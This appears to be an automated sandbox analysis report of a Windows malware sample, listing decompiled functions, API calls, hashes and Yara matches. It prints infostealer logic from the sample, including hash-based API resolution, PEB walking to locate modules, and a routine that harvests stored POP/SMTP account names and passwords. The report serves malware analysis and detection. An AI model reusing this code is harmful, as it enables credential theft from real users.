                                      • API String ID: 1863332320-0
                                      • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                      • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                      • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                      • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                                      0x00403bc4
                                      0x00403bcc
                                      0x00403bcf

                                      APIs
                                      • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                      • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                      • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                      • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                                      0x00404a0d
                                      0x00404a15
                                      0x00404a18

                                      APIs
                                      • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                      • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                      • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                      • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                                      0x00403b72
                                      0x00403b7a
                                      0x00403b7d

                                      APIs
                                      • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID:
                                      • API String ID: 1174141254-0
                                      • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                      • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                      • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                      • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: closesocket
                                      • String ID:
                                      • API String ID: 2781271927-0
                                      • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                      • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                      • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                      • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                                      0x00403fac
                                      0x00403fba
                                      0x00403fbe

                                      APIs
                                      • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                      • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                      • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                      • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                                      0x0040647f
                                      0x00406487
                                      0x0040648a

                                      APIs
                                      • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                      • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                      • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                      • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004058EA, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}





                                      0x004058f8
                                      0x00405903
                                      0x00405906

                                      APIs
                                      • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                      • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                      • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                      • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405924, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}





                                      0x00405932
                                      0x0040593d
                                      0x00405940

                                      APIs
                                      • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                      • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                      • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                      • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0040438F
                                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                      • VariantInit.OLEAUT32(?), ref: 004043C4
                                      • SysAllocString.OLEAUT32(?), ref: 004043CD
                                      • VariantInit.OLEAUT32(?), ref: 00404414
                                      • SysAllocString.OLEAUT32(?), ref: 00404419
                                      • VariantInit.OLEAUT32(?), ref: 00404431
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: InitVariant$AllocString$CreateInitializeInstance
                                      • String ID:
                                      • API String ID: 1312198159-0
                                      • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                      • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                      • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                      • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 88%
                                      			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                                      0x0040d070
                                      0x0040d080
                                      0x0040d084
                                      0x0040d086
                                      0x0040d08c
                                      0x0040d0a0
                                      0x0040d0ae
                                      0x0040d0bd
                                      0x0040d0c0
                                      0x0040d0c5
                                      0x0040d0c9
                                      0x0040d0e3
                                      0x0040d0f2
                                      0x0040d101
                                      0x0040d104
                                      0x0040d109
                                      0x0040d110
                                      0x0040d11e
                                      0x0040d123
                                      0x0040d126
                                      0x0040d12d
                                      0x0040d145
                                      0x0040d154
                                      0x0040d15a
                                      0x0040d166
                                      0x0040d174
                                      0x0040d186
                                      0x0040d18e
                                      0x0040d19a
                                      0x0040d1ac
                                      0x0040d1ba
                                      0x0040d1cc
                                      0x0040d1d1
                                      0x0040d1dd
                                      0x0040d1e2
                                      0x0040d1e7
                                      0x0040d1e7
                                      0x0040d1e7
                                      0x0040d1eb
                                      0x0040d1f1
                                      0x0040d1f7
                                      0x0040d1ff
                                      0x0040d207
                                      0x0040d20f
                                      0x0040d217
                                      0x0040d21f
                                      0x0040d227
                                      0x0040d230

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                      • API String ID: 0-2111798378
                                      • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                      • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                      • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                      • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040317B, Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 90%
                                      			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}














                                      0x0040317f
                                      0x00403180
                                      0x00403180
                                      0x00403180
                                      0x0040318d
                                      0x00403196
                                      0x00403199
                                      0x0040319b
                                      0x004031a1
                                      0x004031a9
                                      0x004031ab
                                      0x004031ac
                                      0x004031ae
                                      0x00000000
                                      0x004031b0
                                      0x004031b3
                                      0x004031c2
                                      0x004031c7
                                      0x004031cd
                                      0x004031e0
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004031cd
                                      0x004031d7
                                      0x004031dd
                                      0x004031cf
                                      0x004031cf
                                      0x004031d1
                                      0x004031d5
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                      • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                      • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                      • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                      Uniqueness

                                      Uniqueness Score: -1.00%